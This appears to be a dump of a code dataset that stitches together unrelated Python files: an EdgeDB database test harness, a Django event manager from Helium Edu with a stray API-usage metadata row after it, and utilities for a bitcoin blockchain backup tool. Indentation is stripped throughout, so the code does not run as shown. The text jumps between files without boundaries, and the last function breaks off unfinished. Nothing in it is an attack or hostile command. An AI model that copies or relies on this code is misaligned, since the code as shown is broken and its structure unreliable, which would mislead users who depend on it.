cluster_addr = os.environ.get('EDGEDB_TEST_CLUSTER_ADDR')
if cluster_addr:
conn_spec = json.loads(cluster_addr)
_default_cluster = edgedb_cluster.RunningCluster(**conn_spec)
else:
data_dir = os.environ.get('EDGEDB_TEST_DATA_DIR')
_default_cluster = _init_cluster(
data_dir=data_dir, cleanup_atexit=cleanup_atexit)
return _default_cluster
def _shutdown_cluster(cluster, *, destroy=True):
global _default_cluster
_default_cluster = None
if cluster is not None:
cluster.stop()
if destroy:
cluster.destroy()
class ClusterTestCase(TestCase):
BASE_TEST_CLASS = True
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.cluster = _start_cluster(cleanup_atexit=True)
class RollbackChanges:
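    """Async context manager wrapping a block in a transaction that is
    always rolled back on exit.
    """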
def __init__(self, test):
self._conn = test.con
async def __aenter__(self):
self._tx = self._conn.transaction()
await self._tx.start()
async def __aexit__(self, exc_type, exc, tb):
await self._tx.rollback()
class ConnectedTestCaseMixin:
@classmethod
async def connect(cls, *,
cluster=None,
database=edgedb_defines.EDGEDB_SUPERUSER_DB,
user=edgedb_defines.EDGEDB_SUPERUSER,
password='<PASSWORD>'):
conargs = cls.get_connect_args(
cluster=cluster, database=database, user=user, password=password)
return await edgedb.async_connect(**conargs)
@classmethod
def get_connect_args(cls, *,
cluster=None,
database=edgedb_defines.EDGEDB_SUPERUSER_DB,
user=edgedb_defines.EDGEDB_SUPERUSER,
password='<PASSWORD>'):
if cluster is None:
cluster = cls.cluster
conargs = cluster.get_connect_args().copy()
conargs.update(dict(user=user,
password=password,
database=database))
return conargs
def _run_and_rollback(self):
return RollbackChanges(self)
async def assert_query_result(self, query,
exp_result_json,
exp_result_binary=...,
*,
msg=None, sort=None):
try:
tx = self.con.transaction()
await tx.start()
try:
res = await self.con.fetchall_json(query)
finally:
await tx.rollback()
res = json.loads(res)
if sort is not None:
self._sort_results(res, sort)
self._assert_data_shape(res, exp_result_json, message=msg)
except Exception:
self.add_fail_notes(serialization='json')
raise
if exp_result_binary is ...:
# The expected result is the same
exp_result_binary = exp_result_json
try:
res = await self.con.fetchall(query)
res = serutils.serialize(res)
if sort is not None:
self._sort_results(res, sort)
self._assert_data_shape(res, exp_result_binary, message=msg)
except Exception:
self.add_fail_notes(serialization='binary')
raise
def _sort_results(self, results, sort):
if sort is True:
sort = lambda x: x
# don't bother sorting empty things
if results:
# sort can be either a key function or a dict
if isinstance(sort, dict):
# the keys in the dict indicate the fields that
# actually must be sorted
for key, val in sort.items():
# '.' is a special key referring to the base object
if key == '.':
self._sort_results(results, val)
else:
if isinstance(results, list):
for r in results:
self._sort_results(r[key], val)
else:
self._sort_results(results[key], val)
else:
results.sort(key=sort)
def _assert_data_shape(self, data, shape, message=None):
_void = object()
def _format_path(path):
if path:
return 'PATH: ' + ''.join(str(p) for p in path)
else:
return 'PATH: <top-level>'
def _assert_type_shape(path, data, shape):
if shape in (int, float):
if not isinstance(data, shape):
self.fail(
f'{message}: expected {shape}, got {data!r} '
f'{_format_path(path)}')
else:
try:
shape(data)
except (ValueError, TypeError):
self.fail(
f'{message}: expected {shape}, got {data!r} '
f'{_format_path(path)}')
def _assert_dict_shape(path, data, shape):
for sk, sv in shape.items():
if not data or sk not in data:
self.fail(
f'{message}: key {sk!r} '
f'is missing\n{pprint.pformat(data)} '
f'{_format_path(path)}')
_assert_generic_shape(path + (f'["{sk}"]',), data[sk], sv)
def _list_shape_iter(shape):
last_shape = _void
for item in shape:
if item is Ellipsis:
if last_shape is _void:
raise ValueError(
                            'invalid shape spec: Ellipsis cannot be the '
'first element')
while True:
yield last_shape
last_shape = item
yield item
def _assert_list_shape(path, data, shape):
if not isinstance(data, list):
self.fail(
f'{message}: expected list '
f'{_format_path(path)}')
if not data and shape:
self.fail(
f'{message}: expected non-empty list '
f'{_format_path(path)}')
shape_iter = _list_shape_iter(shape)
_data_count = 0
for _data_count, el in enumerate(data):
try:
el_shape = next(shape_iter)
except StopIteration:
self.fail(
f'{message}: unexpected trailing elements in list '
f'{_format_path(path)}')
_assert_generic_shape(
path + (f'[{_data_count}]',),
el,
el_shape)
if len(shape) > _data_count + 1:
if shape[_data_count + 1] is not Ellipsis:
self.fail(
f'{message}: expecting more elements in list '
f'{_format_path(path)}')
def _assert_set_shape(path, data, shape):
if not isinstance(data, (list, set)):
self.fail(
f'{message}: expected list or set '
f'{_format_path(path)}')
if not data and shape:
self.fail(
f'{message}: expected non-empty set '
f'{_format_path(path)}')
shape_iter = _list_shape_iter(sorted(shape))
_data_count = 0
for _data_count, el in enumerate(sorted(data)):
try:
el_shape = next(shape_iter)
except StopIteration:
self.fail(
f'{message}: unexpected trailing elements in set '
f'[path {_format_path(path)}]')
_assert_generic_shape(
path + (f'{{{_data_count}}}',), el, el_shape)
if len(shape) > _data_count + 1:
if Ellipsis not in shape:
self.fail(
f'{message}: expecting more elements in set '
f'{_format_path(path)}')
def _assert_generic_shape(path, data, shape):
if isinstance(shape, nullable):
if data is None:
return
else:
shape = shape.value
if isinstance(shape, list):
return _assert_list_shape(path, data, shape)
elif isinstance(shape, set):
return _assert_set_shape(path, data, shape)
elif isinstance(shape, dict):
return _assert_dict_shape(path, data, shape)
elif isinstance(shape, type):
return _assert_type_shape(path, data, shape)
elif isinstance(shape, float):
if not math.isclose(data, shape, rel_tol=1e-04):
self.fail(
f'{message}: not isclose({data}, {shape}) '
f'{_format_path(path)}')
elif isinstance(shape, uuid.UUID):
# since the data comes from JSON, it will only have a str
if data != str(shape):
self.fail(
f'{message}: {data!r} != {shape!r} '
f'{_format_path(path)}')
elif isinstance(shape, (str, int, timedelta, decimal.Decimal)):
if data != shape:
self.fail(
f'{message}: {data!r} != {shape!r} '
f'{_format_path(path)}')
elif shape is None:
if data is not None:
self.fail(
f'{message}: {data!r} is expected to be None '
f'{_format_path(path)}')
else:
raise ValueError(f'unsupported shape type {shape}')
message = message or 'data shape differs'
return _assert_generic_shape((), data, shape)
class CLITestCaseMixin:
def run_cli(self, *args, input=None):
conn_args = self.get_connect_args()
cmd_args = (
'--host', conn_args['host'],
'--port', conn_args['port'],
'--user', conn_args['user'],
) + args
if conn_args['password']:
cmd_args = ('--password-from-stdin',) + cmd_args
if input is not None:
input = f"{conn_args['password']}\n{input}"
else:
input = f"{conn_args['password']}\n"
runner = click.testing.CliRunner()
return runner.invoke(
cli.cli, args=cmd_args, input=input,
catch_exceptions=False)
class ConnectedTestCase(ClusterTestCase, ConnectedTestCaseMixin):
BASE_TEST_CLASS = True
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.con = cls.loop.run_until_complete(cls.connect())
@classmethod
def tearDownClass(cls):
try:
cls.loop.run_until_complete(cls.con.aclose())
# Give event loop another iteration so that connection
# transport has a chance to properly close.
cls.loop.run_until_complete(asyncio.sleep(0))
cls.con = None
finally:
super().tearDownClass()
class DatabaseTestCase(ClusterTestCase, ConnectedTestCaseMixin):
SETUP = None
TEARDOWN = None
SCHEMA = None
SETUP_METHOD = None
TEARDOWN_METHOD = None
# Some tests may want to manage transactions manually,
# in which case ISOLATED_METHODS will be False.
ISOLATED_METHODS = True
# Turns on "EdgeDB developer" mode which allows using restricted
# syntax like USING SQL and similar. It allows modifying standard
# library (e.g. declaring casts).
INTERNAL_TESTMODE = True
BASE_TEST_CLASS = True
def setUp(self):
if self.INTERNAL_TESTMODE:
self.loop.run_until_complete(
self.con.execute(
'CONFIGURE SESSION SET __internal_testmode := true;'))
if self.ISOLATED_METHODS:
self.xact = self.con.transaction()
self.loop.run_until_complete(self.xact.start())
if self.SETUP_METHOD:
self.loop.run_until_complete(
self.con.execute(self.SETUP_METHOD))
super().setUp()
def tearDown(self):
try:
if self.TEARDOWN_METHOD:
self.loop.run_until_complete(
self.con.execute(self.TEARDOWN_METHOD))
finally:
try:
if self.ISOLATED_METHODS:
self.loop.run_until_complete(self.xact.rollback())
del self.xact
if self.con.is_in_transaction():
self.loop.run_until_complete(
self.con.execute('ROLLBACK'))
raise AssertionError(
'test connection is still in transaction '
'*after* the test')
if not self.ISOLATED_METHODS:
self.loop.run_until_complete(
self.con.execute('RESET ALIAS *;'))
finally:
super().tearDown()
@classmethod
def setUpClass(cls):
super().setUpClass()
dbname = cls.get_database_name()
cls.admin_conn = None
cls.con = None
class_set_up = os.environ.get('EDGEDB_TEST_CASES_SET_UP')
# Only open an extra admin connection if necessary.
if not class_set_up:
script = f'CREATE DATABASE {dbname};'
cls.admin_conn = cls.loop.run_until_complete(cls.connect())
cls.loop.run_until_complete(cls.admin_conn.execute(script))
cls.con = cls.loop.run_until_complete(cls.connect(database=dbname))
if not class_set_up:
script = cls.get_setup_script()
if script:
cls.loop.run_until_complete(cls.con.execute(script))
@classmethod
def get_database_name(cls):
if cls.__name__.startswith('TestEdgeQL'):
dbname = cls.__name__[len('TestEdgeQL'):]
elif cls.__name__.startswith('Test'):
dbname = cls.__name__[len('Test'):]
else:
dbname = cls.__name__
return dbname.lower()
@classmethod
def get_setup_script(cls):
script = ''
# allow the setup script to also run in test mode
if cls.INTERNAL_TESTMODE:
script += '\nCONFIGURE SESSION SET __internal_testmode := true;'
# Look at all SCHEMA entries and potentially create multiple
# modules, but always create the 'test' module.
schema = ['\nmodule test {}']
for name, val in cls.__dict__.items():
m = re.match(r'^SCHEMA(?:_(\w+))?', name)
if m:
module_name = (m.group(1) or 'test').lower().replace(
'__', '.')
with open(val, 'r') as sf:
module = sf.read()
schema.append(f'\nmodule {module_name} {{ {module} }}')
script += f'\nCREATE MIGRATION test_migration'
script += f' TO {{ {"".join(schema)} }};'
script += f'\nCOMMIT MIGRATION test_migration;'
if cls.SETUP:
if not isinstance(cls.SETUP, (list, tuple)):
scripts = [cls.SETUP]
else:
scripts = cls.SETUP
for scr in scripts:
if '\n' not in scr and os.path.exists(scr):
with open(scr, 'rt') as f:
setup = f.read()
else:
setup = scr
script += '\n' + setup
        # turn testmode off again once the setup script has run
if cls.INTERNAL_TESTMODE:
script += '\nCONFIGURE SESSION SET __internal_testmode := false;'
return script.strip(' \n')
@classmethod
def tearDownClass(cls):
script = ''
class_set_up = os.environ.get('EDGEDB_TEST_CASES_SET_UP')
if cls.TEARDOWN and not class_set_up:
script = cls.TEARDOWN.strip()
try:
if script:
cls.loop.run_until_complete(
cls.con.execute(script))
finally:
try:
cls.loop.run_until_complete(cls.con.aclose())
if not class_set_up:
dbname = cls.get_database_name()
script = f'DROP DATABASE {dbname};'
cls.loop.run_until_complete(
cls.admin_conn.execute(script))
finally:
try:
if cls.admin_conn is not None:
cls.loop.run_until_complete(
cls.admin_conn.aclose())
finally:
super().tearDownClass()
@contextlib.asynccontextmanager
async def assertRaisesRegexTx(self, exception, regex, msg=None, **kwargs):
"""A version of assertRaisesRegex with automatic transaction recovery
"""
with super().assertRaisesRegex(exception, regex, msg=msg):
try:
tx = self.con.transaction()
await tx.start()
yield
except BaseException as e:
if isinstance(e, exception):
for attr_name, expected_val in kwargs.items():
val = getattr(e, attr_name)
if val != expected_val:
raise self.failureException(
f'{exception.__name__} context attribute '
f'{attr_name!r} is {val} (expected '
f'{expected_val!r})') from e
raise
finally:
await tx.rollback()
class nullable:
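    """Wrapper marking an expected shape that is also allowed to be None."""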
def __init__(self, value):
self.value = value
class Error:
def __init__(self, cls, message, shape):
self._message = message
self._class = cls
self._shape = shape
@property
def message(self):
return self._message
@property
def cls(self):
return self._class
@property
def shape(self):
return self._shape
class BaseQueryTestCase(DatabaseTestCase):
BASE_TEST_CLASS = True
class DDLTestCase(BaseQueryTestCase):
# DDL test cases generally need to be serialized
# to avoid deadlocks in parallel execution.
SERIALIZED = True
class NonIsolatedDDLTestCase(DDLTestCase):
ISOLATED_METHODS = False
BASE_TEST_CLASS = True
class QueryTestCase(BaseQueryTestCase):
BASE_TEST_CLASS = True
def get_test_cases_setup(cases):
result = []
for case in cases:
if not hasattr(case, 'get_setup_script'):
continue
setup_script = case.get_setup_script()
if not setup_script:
continue
dbname = case.get_database_name()
result.append((case, dbname, setup_script))
return result
def setup_test_cases(cases, conn, num_jobs):
setup = get_test_cases_setup(cases)
async def _run():
if num_jobs == 1:
# Special case for --jobs=1
for _case, dbname, setup_script in setup:
await _setup_database(dbname, setup_script, conn)
else:
async with taskgroup.TaskGroup(name='setup test cases') as g:
# Use a semaphore to limit the concurrency of bootstrap
# tasks to the number of jobs (bootstrap is heavy, having
# more tasks than `--jobs` won't necessarily make
# things faster.)
sem = asyncio.BoundedSemaphore(num_jobs)
async def controller(coro, *args):
async with sem:
await coro(*args)
for _case, dbname, setup_script in setup:
g.create_task(controller(
_setup_database, dbname, setup_script, conn))
return asyncio.run(_run())
async def _setup_database(dbname, setup_script, conn_args):
default_args = {
'user': edgedb_defines.EDGEDB_SUPERUSER,
'password': '<PASSWORD>',
}
default_args.update(conn_args)
admin_conn = await edgedb.async_connect(
database=edgedb_defines.EDGEDB_SUPERUSER_DB,
**default_args)
try:
await admin_conn.execute(f'CREATE DATABASE {dbname};')
finally:
await admin_conn.aclose()
dbconn = await edgedb.async_connect(database=dbname, **default_args)
try:
async with dbconn.transaction():
await dbconn.execute(setup_script)
finally:
await dbconn.aclose()
return dbname
_lock_cnt = 0
def gen_lock_key():
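    """Return a lock key derived from the process id and a per-process counter."""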
global _lock_cnt
_lock_cnt += 1
return os.getpid() * 1000 + _lock_cnt
import logging
from helium.common.managers.basemanager import BaseManager, BaseQuerySet
__author__ = "<NAME>"
__copyright__ = "Copyright 2019, Helium Edu"
__version__ = "1.4.38"
logger = logging.getLogger(__name__)
class EventQuerySet(BaseQuerySet):
def exists_for_user(self, id, user_id):
return self.filter(pk=id, user_id=user_id).exists()
def for_user(self, user_id):
return self.filter(user_id=user_id)
class EventManager(BaseManager):
def get_queryset(self):
return EventQuerySet(self.model, using=self._db)
def exists_for_user(self, id, user_id):
return self.get_queryset().exists_for_user(id, user_id)
def for_user(self, user_id):
return self.get_queryset().for_user(user_id)
| [
"logging.getLogger"
] | [((190, 217), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (207, 217), False, 'import logging\n')] |
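A minimal sketch (not part of the dataset row above) of how such a QuerySet/Manager pair is normally attached to a Django model. The ``Event`` model, its fields, and the call sites are assumptions for illustration only, and the snippet requires a configured Django project; ``EventManager`` is the class defined in the row above.

from django.db import models

class Event(models.Model):          # hypothetical model for illustration
    title = models.CharField(max_length=255)
    user = models.ForeignKey('auth.User', on_delete=models.CASCADE)

    objects = EventManager()

# Typical call sites, assuming request.user identifies the owner:
#   Event.objects.for_user(request.user.pk)
#   Event.objects.exists_for_user(event.pk, request.user.pk)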
'''
Utilities for blockchain backup.
Copyright 2018-2020 DeNova
Last modified: 2020-12-08
'''
import json
import os
from datetime import timedelta
from traceback import format_exc
from django.utils.timezone import now
from blockchain_backup import __file__ as blockchain_backup_file
from blockchain_backup.bitcoin import constants, state
from blockchain_backup.core_version import CORE_VERSION
from blockchain_backup.settings import CONNECTION_HEARTBEAT, USE_SOCKETIO
from denova.os.command import background, run
from denova.os.osid import is_windows
from denova.os.process import get_path, is_program_running
from denova.os.user import whoami
from denova.python.log import get_log
from denova.python.times import seconds_human_readable
log = get_log()
def bitcoin_qt():
'''
Name of bitcoin-qt program.
>>> bitcoin_qt()
'bitcoin-qt'
'''
program = 'bitcoin-qt'
if is_windows():
program += '.exe'
return program
def bitcoin_cli():
'''
Name of bitcoin-cli program.
>>> bitcoin_cli()
'bitcoin-cli'
'''
program = 'bitcoin-cli'
if is_windows():
program += '.exe'
return program
def bitcoind():
'''
Name of bitcoind program.
>>> bitcoind()
'bitcoind'
'''
program = 'bitcoind'
if is_windows():
program += '.exe'
return program
def bitcoin_tx():
'''
Name of bitcoin-tx program.
>>> bitcoin_tx()
'bitcoin-tx'
'''
program = 'bitcoin-tx'
if is_windows():
program += '.exe'
return program
def is_bitcoind_running():
'''
Return True if program is running.
>>> is_bitcoind_running()
False
'''
return is_program_running(bitcoind())
def is_bitcoin_qt_running():
'''
Return True if program is running.
>>> is_bitcoin_qt_running()
False
'''
return is_program_running(bitcoin_qt())
def is_bitcoin_tx_running():
'''
Return True if program is running.
>>> is_bitcoin_tx_running()
False
'''
return is_program_running(bitcoin_tx())
def is_bitcoin_core_running():
'''
Return True if any of the
bitcoin core programs are running.
>>> is_bitcoin_core_running()
False
'''
return (is_bitcoind_running() or
is_bitcoin_qt_running() or
is_bitcoin_tx_running())
def is_backup_running():
'''
Return True if backup is running.
>>> is_backup_running()
False
'''
# backup program is a link to safecopy
return is_program_running(constants.BACKUP_PROGRAM)
def is_restore_running():
'''
Return True if restore is running.
>>> is_restore_running()
False
'''
# restore program is a link to safecopy
return is_program_running(constants.RESTORE_PROGRAM)
def get_bitcoin_bin_dir():
''' Return bitcoin bin dir, or None if bitcoin not running.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> path = get_bitcoin_bin_dir()
>>> (path is None) or ('bitcoin' in path)
True
'''
path = None
for program in [bitcoin_qt(), bitcoin_tx(), bitcoind()]:
if path is None:
path = get_path(program)
if path:
bindir = os.path.dirname(path)
else:
bindir = None
return bindir
def get_bitcoin_version():
'''
Get the version of bitcoin core.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> get_bitcoin_version()
'0.20.1'
'''
from blockchain_backup.bitcoin.preferences import get_bin_dir
bitcoin_core_version = CORE_VERSION
try:
VERSION_PREFIX = ' version v'
command_args = []
bin_dir = get_bin_dir()
if bin_dir is None:
command_args.append(bitcoind())
else:
command_args.append(os.path.join(bin_dir, bitcoind()))
command_args.append('--version')
result = run(*command_args)
i = result.stdout.find('\n')
if i > 0:
stdout = result.stdout[:i]
else:
stdout = result.stdout
i = stdout.find(VERSION_PREFIX)
if i > 0:
bitcoin_core_version = stdout[i + len(VERSION_PREFIX):]
log(f'bitcoin core version: {bitcoin_core_version}')
else:
log(f'unable to find version; stdout: {stdout}')
except FileNotFoundError:
log(f'FileNotFoundError: {command_args}')
except PermissionError:
log(f'PermissionError: {command_args}')
except: # 'bare except' because it catches more than "except Exception"
        log(f'unable to get bitcoin core version: {command_args}')
return bitcoin_core_version
def get_blockchain_context():
'''
Get the basic context for a blockchain web page.
>>> context = get_blockchain_context()
>>> context['update_facility']
'denova.blockchain_backup.bitcoin'
>>> context['update_type']
'blockchain_socketio_type'
>>> context['connection_heartbeat']
'--heartbeat--'
'''
context = {'update_facility': constants.BLOCKCHAIN_FACILITY,
'update_type': constants.BLOCKCHAIN_TYPE,
'update_interval': '1000',
'connection_heartbeat': CONNECTION_HEARTBEAT,
}
return context
def get_excluded_files():
'''
Get the files to exclude from backups and restores.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> get_excluded_files()
'wallets,wallet.dat,.walletlock,backups,blockchain_backup_database'
'''
from blockchain_backup.bitcoin.preferences import get_extra_args
excluded_files = 'wallets,wallet.dat,.walletlock,backups,{}'.format(
constants.BLOCKCHAIN_BACKUP_DB_DIR)
use_test_net = constants.TESTNET_FLAG in get_extra_args()
if not use_test_net:
excluded_files += f',{constants.TEST_NET_DIR}'
    # add the subdirectory of the backup if it's in the data directory
backup_subdir = get_backup_subdir()
if backup_subdir is not None and backup_subdir not in excluded_files:
excluded_files += f',{backup_subdir}'
return excluded_files
def get_backup_subdir():
'''
    Get subdir name if it's in the data directory.
>>> from blockchain_backup.bitcoin.preferences import get_preferences, save_preferences
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> get_backup_subdir()
'backups'
>>> prefs = get_preferences()
>>> prefs.backup_dir = '/tmp/bitcoin/backups'
>>> save_preferences(prefs)
>>> get_backup_subdir() is None
True
'''
from blockchain_backup.bitcoin.preferences import get_backup_dir, get_data_dir
data_dir = get_data_dir()
backup_dir = get_backup_dir()
# get the name of the subdirectory of the backup
    # if it's in the data directory
index = backup_dir.find(data_dir)
if index >= 0:
backup_subdir = backup_dir[index + len(data_dir):]
if backup_subdir.startswith(os.sep):
backup_subdir = backup_subdir[1:]
if backup_subdir.endswith(os.sep):
backup_subdir = backup_subdir[:-1]
else:
backup_subdir = None
return backup_subdir
def get_fresh_debug_log(data_dir):
'''
Get the debug log name and
clear it so all entries are from
the new session.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> get_fresh_debug_log('/tmp/bitcoin/data/testnet3')
'/tmp/bitcoin/data/testnet3/debug.log'
'''
debug_log_name = get_debug_log_name(data_dir)
if os.path.exists(debug_log_name):
os.remove(debug_log_name)
return debug_log_name
def get_debug_log_name(data_dir):
'''
Get the debug log name.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> get_debug_log_name('/tmp/bitcoin/data')
'/tmp/bitcoin/data/debug.log'
>>> get_debug_log_name('/tmp/bitcoin/data/testnet3')
'/tmp/bitcoin/data/testnet3/debug.log'
'''
debug_log_name = os.path.join(data_dir, constants.DEBUG_LOG)
return debug_log_name
def strip_testnet_from_data_dir(data_dir=None):
'''
Get the data dirname without
the "testnet3" subdir, if appropriate.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> strip_testnet_from_data_dir()
'/tmp/bitcoin/data'
'''
from blockchain_backup.bitcoin.preferences import get_data_dir, get_extra_args
if data_dir is None:
data_dir = get_data_dir()
use_test_net = constants.TESTNET_FLAG in get_extra_args()
if use_test_net and data_dir.endswith(constants.TEST_NET_SUBDIR):
new_data_dir = data_dir[:data_dir.rfind(constants.TEST_NET_SUBDIR)]
else:
new_data_dir = data_dir
return new_data_dir
def send_socketio_message(key, html):
'''
Send a message to the user via socketio.
>>> key = 'button'
>>> html = 'Test'
>>> send_socketio_message(key, html)
'''
if USE_SOCKETIO:
try:
update = json.dumps({f'{key}_html': html})
log(f'socketio update: {update}')
#socketio_message = {'type': constants.BLOCKCHAIN_TYPE,
# 'server_nonce': server_nonce(),
# 'update': update,
# 'update_time': format_time(str(now())),
# }
#redis_message = RedisMessage(json.dumps(socketio_message))
#RedisPublisher(facility=constants.BLOCKCHAIN_FACILITY,
# broadcast=True).publish_message(redis_message)
except ConnectionRefusedError as cre:
log(str(cre))
except Exception as e:
log(str(e))
def is_dir_writeable(data_dir):
'''
Return True if a new file
can be created in the dir.
>>> data_dir = '/tmp'
>>> is_dir_writeable(data_dir)
(True, None)
>>> data_dir = '/'
>>> ok, error_message = is_dir_writeable(data_dir)
>>> ok == False
True
>>> error_message.startswith('Unable to write to the data dir')
True
>>> data_dir = '/unknown'
>>> is_dir_writeable(data_dir)
(False, '"/unknown" directory does not exist.')
'''
try:
filename = os.path.join(data_dir, '.test')
with open(filename, "wt") as output_file:
output_file.write('test')
os.remove(filename)
ok = True
error = None
except PermissionError:
ok = False
error = f'Unable to write to the data dir in {data_dir} as {whoami()}.'
log(error)
except FileNotFoundError:
ok = False
error = f'"{data_dir}" directory does not exist.'
log(error)
return ok, error
def format_time(unformatted_time):
'''
Format time so seconds, milliseconds, and timezone are stripped.
>>> format_time('2009-01-12 12:00:00.000000+00:00')
'2009-01-12 12:00'
'''
i = unformatted_time.find('.')
if i > 0:
unformatted_time = unformatted_time[:i]
i = unformatted_time.rfind(':')
if i > 0:
unformatted_time = unformatted_time[:i]
return unformatted_time
def wait_period(formatted_time):
'''
Format the period to wait into readable hours and minutes.
>>> last_backed_up_time = state.get_last_backed_up_time()
>>> hours_til_next_backup = format_time(str(now() - last_backed_up_time))
>>> time_period = wait_period(hours_til_next_backup)
>>> time_period is not None
True
'''
def format_hours_section(hours, extra_hours):
''' Format the hours. '''
hours_section = None
if hours is not None and hours:
hours = int(hours) + extra_hours
if hours > 1:
if extra_hours > 0:
hours_section = f'>{hours} hours'
else:
hours_section = f'{hours} hours'
elif hours == 1:
hours_section = f'{hours} hour'
return hours_section
def format_minutes_section(minutes):
''' Format the minutes. '''
minutes_section = None
if minutes is not None and minutes:
if int(minutes) > 1:
minutes_section = f'{minutes} minutes'
elif int(minutes) == 1:
minutes_section = f'{minutes} minute'
return minutes_section
i = formatted_time.rfind(',')
if i > 0:
extra_hours = 24
formatted_time = formatted_time[i+1:].strip()
else:
extra_hours = 0
i = formatted_time.find(':')
if i >= 0:
hours = formatted_time[:i]
minutes = formatted_time[i+1:]
else:
hours = None
minutes = None
hours_section = format_hours_section(hours, extra_hours)
minutes_section = format_minutes_section(minutes)
if hours_section is None and minutes_section is None:
time_period = 'less than a minute'
elif hours_section is None:
time_period = minutes_section
elif minutes_section is None:
time_period = hours_section
else:
time_period = f'{hours_section} and {minutes_section}'
return time_period
def get_next_backup_time():
'''
Get the next time we need to backup.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> next_backup_time = get_next_backup_time()
>>> next_backup_time is not None
True
'''
from blockchain_backup.bitcoin.preferences import get_backup_schedule
last_backed_up_time = state.get_last_backed_up_time()
bkup_schedule = get_backup_schedule()
next_backup_time = last_backed_up_time + timedelta(hours=bkup_schedule)
return next_backup_time
def get_next_backup_in():
'''
Get the hours/minutes until next backup.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> next_backup_in = get_next_backup_in()
>>> next_backup_in is not None
True
'''
next_backup_time = get_next_backup_time()
seconds = (next_backup_time - now()).total_seconds()
status = seconds_human_readable(seconds)
return status
def need_to_backup(data_dir, current_block):
'''
Check the time stamp of the last backup
and whether updates are needed.
    Don't back up too often; make sure enough time
has passed to make it worth the resources.
>>> from denova.python.log import get_log_path
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> log_name = os.path.basename(get_log_path())
>>> data_dir = '/tmp/bitcoin/data'
>>> os.chdir(data_dir)
>>> last_block_updated = state.get_last_block_updated()
>>> state.set_last_block_updated(551292)
>>> current_block = 551301
>>> need_to_backup(data_dir, current_block)
False
>>> state.set_last_block_updated(0)
>>> current_block = 551301
>>> need_to_backup(data_dir, current_block)
False
>>> current_block = 0
>>> need_to_backup(data_dir, current_block)
False
>>> state.set_last_block_updated(last_block_updated)
'''
try:
message = None
current_time = now()
next_backup_time = get_next_backup_time()
need_backup = next_backup_time < current_time
if need_backup:
start_access_time = state.get_start_access_time()
last_access_time = state.get_last_access_time()
last_backed_up_time = state.get_last_backed_up_time()
# don't bother backing up if Blockchain Backup hasn't started
# either bitcoind or bitcoin-qt
if start_access_time < last_access_time:
if last_access_time < last_backed_up_time:
need_backup = False
state.set_last_backed_up_time(now())
log('set last backed up time to now because no access since last backup')
if need_backup:
# if there's no data yet, than there's no need for a backup
# 5 items is picked as a quick test
if len(os.listdir(data_dir)) <= 5:
need_backup = False
log('no data so no need to back up')
else:
last_block_updated = state.get_last_block_updated()
if current_block < 0 and last_block_updated == 0:
pass # yes, we need to backup; I find this test easier than alternatives
elif current_block > 0:
if last_block_updated == 0 or current_block > last_block_updated:
state.set_last_block_updated(current_block)
else:
need_backup = False
message = 'The blockchain was not backed up because no new blocks were received.'
log(message)
check_for_updates(current_time=current_time)
except: # 'bare except' because it catches more than "except Exception"
# backup if anything in our analysis goes wrong
need_backup = True
log(format_exc())
return need_backup
def delete_last_updated_files(dirname):
'''
Delete all the "last-updated" files from the directory.
Return the number of files deleted.
>>> dirname = '/tmp/bitcoin/data/testnet3'
>>> delete_last_updated_files(dirname)
0
'''
files_deleted = 0
# remove all files that suggest this backup is complete
entries = os.scandir(dirname)
for entry in entries:
if entry.is_file() and entry.name.startswith(constants.LAST_UPDATED_PREFIX):
os.remove(entry.path)
files_deleted += 1
return files_deleted
def get_most_recent_confirmation(last_block_time):
'''
Get and format the most recent
confirmation of the blockchain.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> get_most_recent_confirmation(now())
'Up to date'
'''
seconds = (now() - last_block_time).total_seconds()
time_behind = seconds_human_readable(seconds)
if time_behind is None or time_behind == '0 seconds':
time_behind = 'Up to date'
return time_behind
def check_for_updates(current_time=None, force=False, reason=None):
'''
Check to see if updates are needed.
>>> from blockchain_backup.bitcoin.tests import utils as test_utils
>>> test_utils.init_database()
>>> check_for_updates()
True
'''
updates_checked = False
try:
if current_time is None:
current_time = now()
next_updates_time = state.get_last_update_time() + timedelta(hours=24)
if force or next_updates_time <= current_time:
log('starting to check for the latest updates')
# set the update time now so we don't restart the check too often
state.set_last_update_time(current_time)
command_args = []
command_args.append('python3')
# get the path for check_for_updates.py, regardless of virtualenv, etc.
check_program = os.path.realpath(os.path.abspath(os.path.join(
os.path.dirname(blockchain_backup_file), 'config', 'check_for_updates.py')))
command_args.append(check_program)
if reason is not None:
command_args.append(reason)
background(*command_args)
updates_checked = True
except: # 'bare except' because it catches more than "except Exception"
log(format_exc())
return updates_checked
def get_path_of_core_apps():
'''
Get the path of the bitcoin core apps.
>>> bin_dir = get_path_of_core_apps()
>>> len(bin_dir) > 0
True
'''
bin_dir = None
entries = os.get_exec_path()
for entry in entries:
if (os.path.exists(os.path.join(entry, bitcoind())) and
os.path.exists(os.path.join(entry, bitcoin_cli())) and
os.path.exists(os.path.join(entry, bitcoind()))):
bin_dir = entry
break
return bin_dir
def get_ok_button():
'''
Get a button.
>>> get_ok_button()
' <a href="/" name="ok-button" id="ok-id" class="btn btn-secondary" title="Click to return to front page." role="button"> <strong>OK</strong> </a><br/>'
'''
return get_button('/', 'OK', 'Click to return to front page.')
def get_button(href, label, tooltip):
'''
Get a button.
>>> get_button("/", "OK", "It's ok to return to front page")
' <a href="/" name="ok-button" id="ok-id" class="btn btn-secondary" title="It\\'s ok to return to front page" role="button"> <strong>OK</strong> </a><br/>'
'''
base = label.replace(' ', '-').replace(',', '').replace("'", '').lower()
name = f'{base}-button'
id_tag = f'{base}-id'
